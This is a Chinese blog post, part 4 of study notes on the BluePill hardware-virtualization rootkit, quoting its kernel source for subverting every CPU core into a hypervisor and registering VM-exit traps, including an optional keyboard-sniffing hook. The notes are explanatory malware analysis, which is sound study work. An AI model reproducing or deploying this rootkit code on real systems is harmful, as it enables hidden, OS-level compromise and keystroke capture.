学习BluePill源码笔记-4

最新推荐文章于 2025-04-07 09:12:59 发布
最新推荐文章于 2025-04-07 09:12:59 发布
阅读量1.4k 收藏
点赞数
分类专栏: 硬件虚拟化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xboxmicro/article/details/37569735
版权
本文是学习BluePill源码的笔记,重点探讨了HvmSwallowBluepill函数,包括CmDeliverToProcessor的实现和HvmSubvertCpu中的GDT、IDT初始化。此外,还详细介绍了如何通过Hvm->ArchRegisterTraps(Cpu)注册VMEXIT事件处理函数,以实现虚拟机模式的开启和管理。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2.2 

2.2.1HvmSwallowBluepill函数

NTSTATUS NTAPI HvmSwallowBluepill (
)
{
  CCHAR cProcessorNumber;
  NTSTATUS Status, CallbackStatus;

  _KdPrint (("HvmSwallowBluepill(): Going to subvert %d processor%s\n",
             KeNumberProcessors, KeNumberProcessors == 1 ? "" : "s"));

  KeWaitForSingleObject (&g_HvmMutex, Executive, KernelMode, FALSE, NULL);

  for (cProcessorNumber = 0; cProcessorNumber < KeNumberProcessors; cProcessorNumber++) {

    _KdPrint (("HvmSwallowBluepill(): Subverting processor #%d\n", cProcessorNumber));

    Status = CmDeliverToProcessor (cProcessorNumber, CmSubvert, NULL, &CallbackStatus);

    if (!NT_SUCCESS (Status)) {
      _KdPrint (("HvmSwallowBluepill(): CmDeliverToProcessor() failed with status 0x%08hX\n", Status));
      KeReleaseMutex (&g_HvmMutex, FALSE);

      HvmSpitOutBluepill ();

      return Status;
    }

    if (!NT_SUCCESS (CallbackStatus)) {
      _KdPrint (("HvmSwallowBluepill(): HvmSubvertCpu() failed with status 0x%08hX\n", CallbackStatus));
      KeReleaseMutex (&g_HvmMutex, FALSE);

      HvmSpitOutBluepill ();

      return CallbackStatus;
    }
  }

for (cProcessorNumber = 0; cProcessorNumber < KeNumberProcessors; cProcessorNumber++)开始到结束为该函数的核心。

CmDeliverToProcessor的代码如下:

NTSTATUS NTAPI CmDeliverToProcessor (
  CCHAR cProcessorNumber,
  PCALLBACK_PROC CallbackProc,
  PVOID CallbackParam,
  PNTSTATUS pCallbackStatus
)
{
  NTSTATUS CallbackStatus;
  KIRQL OldIrql;

  if (!CallbackProc)
    return STATUS_INVALID_PARAMETER;

  if (pCallbackStatus)
    *pCallbackStatus = STATUS_UNSUCCESSFUL;

  KeSetSystemAffinityThread ((KAFFINITY) (1 << cProcessorNumber));

  OldIrql = KeRaiseIrqlToDpcLevel ();
  CallbackStatus = CallbackProc (CallbackParam);

  KeLowerIrql (OldIrql);

  KeRevertToUserAffinityThread ();

  // save the status of the callback which has run on the current core
  if (pCallbackStatus)
    *pCallbackStatus = CallbackStatus;

  return STATUS_SUCCESS;
}
CmDeliverToProcessor代码检查参数后,提高当前线程在CPU中的亲和性(目的似乎是为了在执行该指令时不被打断)升高IRQL(只能NonPagedPool),调用HvmSubvertCpu函数。之后,降低IRQL,降低当前线程在CPU中的亲和性。


HvmSubvertCpu()函数:

NTSTATUS NTAPI HvmSubvertCpu (
  PVOID GuestRsp
)
{
  PCPU Cpu;
  PVOID HostKernelStackBase;
  NTSTATUS Status;
  PHYSICAL_ADDRESS HostStackPA;

  _KdPrint (("HvmSubvertCpu(): Running on processor #%d\n", KeGetCurrentProcessorNumber ()));

  if (!Hvm->ArchIsHvmImplemented ()) {
    _KdPrint (("HvmSubvertCpu(): HVM extensions not implemented on this processor\n"));
    return STATUS_NOT_SUPPORTED;
  }

  HostKernelStackBase = MmAllocatePages (HOST_STACK_SIZE_IN_PAGES, &HostStackPA);
  if (!HostKernelStackBase) {
    _KdPrint (("HvmSubvertCpu(): Failed to allocate %d pages for the host stack\n", HOST_STACK_SIZE_IN_PAGES));
    return STATUS_INSUFFICIENT_RESOURCES;
  }

  Cpu = (PCPU) ((PCHAR) HostKernelStackBase + HOST_STACK_SIZE_IN_PAGES * PAGE_SIZE - 8 - sizeof (CPU));
  Cpu->HostStack = HostKernelStackBase;

  // for interrupt handlers which will address CPU through the FS
  Cpu->SelfPointer = Cpu;

  Cpu->ProcessorNumber = KeGetCurrentProcessorNumber ();

  Cpu->Nested = FALSE;

  InitializeListHead (&Cpu->GeneralTrapsList);
  InitializeListHead (&Cpu->MsrTrapsList);
  InitializeListHead (&Cpu->IoTrapsList);

  Cpu->GdtArea = MmAllocatePages (BYTES_TO_PAGES (BP_GDT_LIMIT), NULL);

  if (!Cpu->GdtArea) {
    _KdPrint (("HvmSubvertCpu(): Failed to allocate memory for GDT\n"));
    return STATUS_INSUFFICIENT_RESOURCES;
  }

  Cpu->IdtArea = MmAllocatePages (BYTES_TO_PAGES (BP_IDT_LIMIT), NULL);
  if (!Cpu->IdtArea) {
    _KdPrint (("HvmSubvertCpu(): Failed to allocate memory for IDT\n"));
    return STATUS_INSUFFICIENT_RESOURCES;
  }
  // allocate a 4k page. Fail the init if we can't allocate such page
  // (e.g. all allocations reside on 2mb pages).

  //Cpu->SparePage=MmAllocatePages(1,&Cpu->SparePagePA);
  Cpu->SparePage = MmAllocateContiguousPagesSpecifyCache (1, &Cpu->SparePagePA, MmCached);
  if (!Cpu->SparePage) {
    _KdPrint (("HvmSubvertCpu(): Failed to allocate 1 page for the dummy page (DPA_CONTIGUOUS)\n"));
    return STATUS_UNSUCCESSFUL;
  }
  // this is valid only for host page tables, as this VA may point into 2mb page in the guest.
  Cpu->SparePagePTE = (PULONG64) ((((ULONG64) (Cpu->SparePage) >> 9) & 0x7ffffffff8) + PT_BASE);

#ifdef SVM_SPAREPAGE_NON_CACHED
  *Cpu->SparePagePTE |= (1 << 4);       // set PCD (Cache Disable);
#endif

  Status = Hvm->ArchRegisterTraps (Cpu);
  if (!NT_SUCCESS (Status)) {
    _KdPrint (("HvmSubvertCpu(): Failed to register NewBluePill traps, status 0x%08hX\n", Status));
    return STATUS_UNSUCCESSFUL;
  }

  Status = Hvm->ArchInitialize (Cpu, CmSlipIntoMatrix, GuestRsp);
  if (!NT_SUCCESS (Status)) {
    _KdPrint (("HvmSubvertCpu(): ArchInitialize() failed with status 0x%08hX\n", Status));
    return Status;
  }

  InterlockedIncrement (&g_uSubvertedCPUs);

#if 0
  Cpu->LapicBaseMsr.QuadPart = MsrRead (MSR_IA32_APICBASE);
  if (Cpu->LapicBaseMsr.QuadPart & MSR_IA32_APICBASE_ENABLE) {
    Cpu->LapicPhysicalBase.QuadPart = Cpu->LapicBaseMsr.QuadPart & MSR_IA32_APICBASE_BASE;
    Cpu->LapicVirtualBase = (PVOID) Cpu->LapicPhysicalBase.QuadPart;

    // set VA=PA
    MmCreateMapping (Cpu->LapicPhysicalBase, Cpu->LapicVirtualBase, FALSE);

    _KdPrint (("HvmSubvertCpu(): Local APIC Base PA 0x%08hX, mapped to VA 0x%08hX\n", Cpu->LapicPhysicalBase.QuadPart,
               Cpu->LapicVirtualBase));
  } else {
    _KdPrint (("HvmSubvertCpu(): Local APIC is disabled\n"));
  }
#endif

  // no API calls allowed below this point: we have overloaded GDTR and selectors
#ifdef _X86_

#else
  HvmSetupGdt (Cpu);
  HvmSetupIdt (Cpu);
#endif
#if DEBUG_LEVEL>1
  _KdPrint (("HvmSubvertCpu(): RFLAGS = %#x, CR8 = %#x\n", RegGetRflags (), RegGetCr8 ()));
#endif
  Status = Hvm->ArchVirtualize (Cpu);

  // never reached
  InterlockedDecrement (&g_uSubvertedCPUs);
  return Status;
}

该函数首先创建并初始化了一个CPU结构,接着构造了自己的GDT表和IDT表。

最后,该函数侵染CPU核心。侵染过程如下: 

  Status = Hvm->ArchRegisterTraps (Cpu);
  Status = Hvm->ArchInitialize (Cpu, CmSlipIntoMatrix, GuestRsp);
  InterlockedIncrement (&g_uSubvertedCPUs);
  Cpu->LapicBaseMsr.QuadPart = MsrRead (MSR_IA32_APICBASE);
  if (Cpu->LapicBaseMsr.QuadPart & MSR_IA32_APICBASE_ENABLE) {
    Cpu->LapicPhysicalBase.QuadPart = Cpu->LapicBaseMsr.QuadPart & MSR_IA32_APICBASE_BASE;
    Cpu->LapicVirtualBase = (PVOID) Cpu->LapicPhysicalBase.QuadPart;

    // set VA=PA
    MmCreateMapping (Cpu->LapicPhysicalBase, Cpu->LapicVirtualBase, FALSE);

  }
  Status = Hvm->ArchVirtualize (Cpu);

  // never reached
  InterlockedDecrement (&g_uSubvertedCPUs);
  return Status;
}

2.2.2 侵染核心三个步骤

Hvm->ArchRegisterTraps(Cpu) 注册VMEXIT事件处理函数

Hvm->ArchInitialize(Cpu, CmSlipIntoMatrix, GuestRsp); 开启虚拟机模式成为Hypervisor并构建虚拟机装入原来的操作系统

Hvm->ArchVirtualize(Cpu)开启虚拟机。


2.2.3 Hvm->ArchRegisterTraps(Cpu) 注册VMEXIT事件处理函数

该方法对应的函数实际为(不讨论AMD)位于vmxtraps.c

NTSTATUS NTAPI VmxRegisterTraps (
  PCPU Cpu
)
{
  NTSTATUS Status;
  PNBP_TRAP Trap;
#ifndef VMX_SUPPORT_NESTED_VIRTUALIZATION
  // used to set dummy handler for all VMX intercepts when we compile without nested support
  ULONG32 i, TableOfVmxExits[] = {
    EXIT_REASON_VMCALL,
    EXIT_REASON_VMCALL,
    EXIT_REASON_VMLAUNCH,
    EXIT_REASON_VMRESUME,
    EXIT_REASON_VMPTRLD,
    EXIT_REASON_VMPTRST,
    EXIT_REASON_VMREAD,
    EXIT_REASON_VMWRITE,
    EXIT_REASON_VMXON,
    EXIT_REASON_VMXOFF
  };
#endif

  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_CPUID, 0, // length of the instruction, 0 means length need to be get from vmcs later. 
                                                     VmxDispatchCpuid, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchCpuid with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);

  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_MSR_READ, 0,      // length of the instruction, 0 means length need to be get from vmcs later. 
                                                     VmxDispatchMsrRead, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchMsrRead with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);

  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_MSR_WRITE, 0,     // length of the instruction, 0 means length need to be get from vmcs later. 
                                                     VmxDispatchMsrWrite, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchMsrWrite with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);

  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_CR_ACCESS, 0,     // length of the instruction, 0 means length need to be get from vmcs later. 
                                                     VmxDispatchCrAccess, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchCrAccess with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);

  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_INVD, 0,  // length of the instruction, 0 means length need to be get from vmcs later. 
                                                     VmxDispatchINVD, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchINVD with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);

  // set dummy handler for all VMX intercepts if we compile wihtout nested support
  for (i = 0; i < sizeof (TableOfVmxExits) / sizeof (ULONG32); i++) {
    if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, TableOfVmxExits[i], 0,      // length of the instruction, 0 means length need to be get from vmcs later. 
                                                       VmxDispatchVmxInstrDummy, &Trap))) {
      _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchVmon with status 0x%08hX\n", Status));
      return Status;
    }
    TrRegisterTrap (Cpu, Trap);
  }

#ifdef INTERCEPT_RDTSCs
  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_EXCEPTION_NMI, 0, VmxDispatchException, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchException with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);

  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_RDTSC, 0, VmxDispatchRdtsc, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchRdtsc with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);
#endif
#ifdef VMX_ENABLE_PS2_KBD_SNIFFER
  if (!NT_SUCCESS (Status = TrInitializeGeneralTrap (Cpu, EXIT_REASON_IO_INSTRUCTION, 0,        // length of the instruction, 0 means length need to be get from vmcs later. 
                                                     VmxDispatchIoAccess, &Trap))) {
    _KdPrint (("VmxRegisterTraps(): Failed to register VmxDispatchIoAccess with status 0x%08hX\n", Status));
    return Status;
  }
  TrRegisterTrap (Cpu, Trap);
#endif

  return STATUS_SUCCESS;
}

未完待续。。。


【STM32 Blue Pill编程】-读取数字引脚输入
视觉与物联智能
08-17 545
在本文中,将介绍 STM32 Blue Pill 板的输入/输出 GPIO 引脚,并学习如何使用STM32的GPIO引脚作为输出引脚以及输入引脚。
new-blue-pill源码带注释
09-09
New Blue Pill源代码。 基于硬件虚拟化技术的windows下Rootkit。 2006 年 Black Hat上发表。
学习BluePill源码笔记-2
XboxMicro
06-29 1242
1.5 MmCreateMapping if (!NT_SUCCESS (Status = MmCreateMapping (g_PageMapBasePhysicalAddress, (PVOID) PML4_BASE, FALSE))) { DbgPrint ("MmInitManager(): MmCreateMapping() failed to map PML4 page,
versaloon:一款强大的STM32 Bluepill板JTAG固件
最新发布
gitblog_00320的博客
04-07 822
versaloon:一款强大的STM32 Bluepill板JTAG固件 versaloon JTAG Versaloon firmware for the STM32 Bluepill board 项目地址: https://g...
Blue Pill源代码分析(1)
lzz14的专栏
03-29 7923
一直都有写blog的想法,但是每次总觉得写东西很浪费时间,还不如利用这些时间多学点东西。不过每次学到东西之后,总是很容易遗忘,学到方法不假,一些零碎细节忘的很快,于是决定还是应该写点东西出来作备忘。去年末,对Blue Pill有稍微了解一下,但终究是没有完整阅读过源代码,今天花了一天的时间把Blue Pill的源代码看了一下,总算对其中的奥妙之处有所了解。原先对VT技术不是特别了解的地方今天看了代
new blue pill
09-26
new blue pill source
Bluepill 使用教程
gitblog_00704的博客
08-26 577
Bluepill 使用教程 bluepillsimple process monitoring tool项目地址:https://gitcode.com/gh_mirrors/blu/bluepill 项目介绍 Bluepill 是一个用于并行运行 iOS 测试的工具,通过使用多个模拟器来提高测试效率。LinkedIn 创建了 Bluepill 以在合理的时间内运行其庞大的 iOS 测试套件。B...
学习BluePill源码笔记-1
XboxMicro
06-29 3245
VT-X太高端霸气上档次了,实在是看不懂...
shF103-DAP-SWO-CDC-BLUEPILL-SWD-REMAP(1).zip
07-26
本文将深入解析标题"shF103-DAP-SWO-CDC-BLUEPILL-SWD-REMAP(1).zip"中涉及的关键技术点,包括STM32的SWD重映射功能、DAP-Link的工作原理以及蓝芯板(BLUEPILL)的应用。 首先,我们关注"SWD-REMAP"这一概念。SWD,...
Gerber_PCB_PCB_BluePill_2024-10-22_2024-10-27.zip
10-29
此外,"Gerber_PCB_PCB_BluePill_2024-10-22_2024-10-27"这一标题还表明了文件的用途(PCB设计)、对象(PCB和Blue Pill板——一种基于STM32微控制器的开发板)以及创建时间(2024年10月22日至2024年10月27日)。...
STM32Bluepill_eagle-master_eagle_
09-30
STM32Bluepill_eagle-master_eagle_ 是一个与Eagle软件相关的项目,重点在于它与STM32 Blue Pill开发板的结合。STM32 Blue Pill是一款基于ARM Cortex-M3内核的微控制器开发板,因其核心板上的蓝色塑料封装而得名。...
NewBluePill深入理解硬件虚拟机(PDF+配套源码
03-24
这是本人在实际项目中 借鉴的资料,电子书都是随书以前购买而来,请放心使用
SimpleFOC(七)——STM32(Bluepill)的应用
热门推荐
loop222的博客
06-18 2万+
目录说明一、Bluepill说明1.1、最小系统板1.2、下载模式说明二、软件安装2.1、安装库文件和示例2.2、放入安装文件夹2.3、重新打开IDE2.4、选择上传方式为串口2.5、安装编译器2.6、安装SAM三、点亮LED3.1、硬件准备3.2、示例演示四、I2C读取编码器4.1、硬件准备4.2、示例演示五、双I2C读取编码器5.1、硬件准备5.2、示例演示六、SPI读取编码器6.1、硬件准备6.2、示例演示七、PWM输出7.1、硬件准备7.2、示例演示八、Bluepill+simpleFOCShiel
new blue pill在Intel系列CPU上无法卸载问题
一个热爱逆向,喜爱学习、分享的猿。
09-09 2564
实验环境win7 sp1 x64,newbluepill-0.32,VS2013,WDK8.1 NewBluePill源代码编译后,使用InstDrv成功载入生成的两个驱动:dbgclient.sys和newbp.sys。通过bpknock.exe查看运行结果,成功安装了bluepill。 但卸载时出了问题,dbgclient.sys驱动可以成功卸载,但newbp.sys已卸载系统就停下不动了
blue-pill代码解读
inquisiter
09-21 1135
一、虚拟机启动 整个过程比较清晰,2.7的过程会对vmcs的状态域进行设置,也就是会接管中断过程,VMxLaunch启动硬件虚拟化。 再往上,一段汇编。调用HvmSubvertCpu CmSubvert (PVOID GuestRsp); CmSubvert PROC StdCall _GuestRsp CM_SAVE_ALL_NOSEGREGS mov eax,esp push eax ;setup esp to argv[0] call HvmSubvertCpu
关于stm32f103(BluePill)的一些认识
q781634081的博客
07-06 4043
名称:BluePill就是stm32f103C8(我估计是其一个最流行的f103C8最小板产品的商品名就是BluePill然后大家都抄这个最小板的样式,于是乎就等同起来了) 烧录模式:STM32一共有三种启动模式,在ST官网上下载的RM0008中,可找到启动相关的配置说明: 翻译为中文: 其一般在bluePill实物中的位置: 部分板可能会有自己的创意改造,比如不是用这种短接帽也是改用按键式的。 3. 详细描述(三种模式): STM32三种启动模式对应的存储介质均是芯片内置的,它们是: 1)用户闪存.
Blue Pill源代码分析(4)
lzz14的专栏
04-03 4498
HvmInit分别用AMD65和IA32的实现对当前CPU平台进行识别,并确认是否支持VT技术。HvmSwallowBluepill函数则对当前物理CPU上的所有逻辑CPU,进行虚拟设置,反转到虚拟机的运行状态。CmDeliverToProcessor 函数调用KeSetSystemAffinityThread将当前线程调度到指定的CPU cProcessorNumber,并将IRQL提升到Dpc
RT-Thread STM32F103C8T6最小系统板BluePill BSP说明
华为奋斗者精神
11-29 2241
本文档为 STM32F103C8T6最小系统板(BluePill) 的 BSP (板级支持包) 说明。开发板资源介绍BSP 快速上手进阶使用方法通过阅读快速上手章节开发者可以快速地上手该 BSP,将 RT-Thread 运行在开发板上。在进阶使用指南章节,将会介绍更多高级功能,帮助开发者利用 RT-Thread 驱动更多板载资源。STM32F103C8T6最小系统,采用SWD调试接口,可以用3个接口就能完成调试下载的任务,采用了官方建议的负载RTC晶振方案,小体积高频率的STM32实验板。
STM32 Blue Pill实现USB-HID键盘矩阵
资源摘要信息:"本资源是关于基于STM32开发板的设备,特别是名为“Blue Pill”的开发板,如何将键盘矩阵直接连接到GPIO的相关知识。USB-HID控制器是本资源的重要组成部分,主要用于实现笔记本电脑的按键矩阵。" 知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值